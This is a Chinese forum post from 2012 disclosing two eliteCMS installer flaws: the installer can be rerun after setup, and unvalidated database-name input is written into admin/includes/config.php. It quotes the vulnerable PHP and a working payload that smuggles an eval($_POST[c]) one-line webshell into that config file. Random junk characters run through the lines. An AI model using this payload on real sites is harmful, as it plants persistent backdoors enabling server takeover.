eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
, v$ T' d H( ~/ c- W% c
# F3 r4 Z! y9 n: @另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php* A! A0 z1 P% [8 a
我们来看代码:" p, a l% U) y/ ]# r0 L$ y7 X
9 j/ Q, ?6 }/ l...- m& n6 F, v8 `
elseif ($_GET['step'] == "4") {8 g7 K. M+ B& ^: w; P$ z# k
$file = "../admin/includes/config.php";
# b: S' y/ p) P $write = "<?php\n";2 Z" y- r! y, v
$write .= "/**\n";0 N4 s# w/ N/ a; y# v5 ^9 o
$write .= "*\n";/ `3 r/ p- o8 E& ^( C
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n"; q( C' d# {" P/ I& l6 A2 ]. H! @
...略...; [# i9 ~2 o J9 y( p
$write .= "*\n";1 T5 E; I- g; O& X. `
$write .= "*/\n";
: [! T7 h% y, k* R a7 w3 g $write .= "\n";
* d' f5 A; \+ f C $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";3 p: B6 G% O, E. u
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";" |) ~( K. k2 A) t0 ?4 ?( }
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
h6 k3 u$ h7 r3 U, o9 }! w& r! m; f $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
8 N0 }# N! k# X5 {& `2 H2 A$ o $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";* O( k. S* `+ v8 l9 ~
$write .= "if (!\$connection) {\n";
, i% H L! Q3 v" f! a $write .= " die(\"Database connection failed\" .mysql_error());\n";
9 e+ F2 F$ x5 O' t $write .= " \n";" V* y' `6 u% L$ P) h" d
$write .= "} \n";8 _; a- ^0 R$ c& d: D
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";" ^8 O7 ~$ |; {; S" {
$write .= "if (!\$db_select) {\n";1 P/ J, h2 K3 I4 v8 H" ` f9 g% p- X
$write .= " die(\"Database select failed\" .mysql_error());\n";4 O* J$ p) f7 J
$write .= " \n";. s4 b& D3 a( V* R8 |' x
$write .= "} \n";3 _1 K$ P& Y( Q, o4 E ^
$write .= "?>\n";& _$ ~! K4 J( p: W6 x: l9 D
. Z5 Y8 v! L5 C2 @8 ] $writer = fopen($file, 'w');
6 k2 H6 b, n Z, q...' B2 z3 v5 R" J
& U* P$ O& B5 C5 M# H F在看代码:
6 B3 h/ O6 k5 G. X1 X& t# q 5 R+ @: ~% |- x' z! {! ~
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
' T# F$ y8 y. t9 B* Y' W4 }6 M5 O$_SESSION['DB_NAME'] = $_POST['DB_NAME'];( \2 `9 g5 h' z1 c! \. b2 d
$_SESSION['DB_USER'] = $_POST['DB_USER'];
& H7 A7 c# S& q0 F: i d$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
5 A b$ U2 J3 O5 I6 k4 e
) v% }) l% q: l% h. u5 h2 N* J取值未作任何验证( S- n+ z( V* t, `$ i
如果将数据库名POST数据:
z# b$ \% M5 i, M% x
4 {$ c1 v/ P7 q' P v T"?><?php eval($_POST[c]);?><?php
$ l* b; G6 W" p6 ^* [0 U( C
/ i( j$ l6 O' T6 z p将导致一句话后门写入/admin/includes/config.php
+ t$ S' Y! _3 I6 o |
发表于 2012-11-18 13:59:27
收藏
支持
反对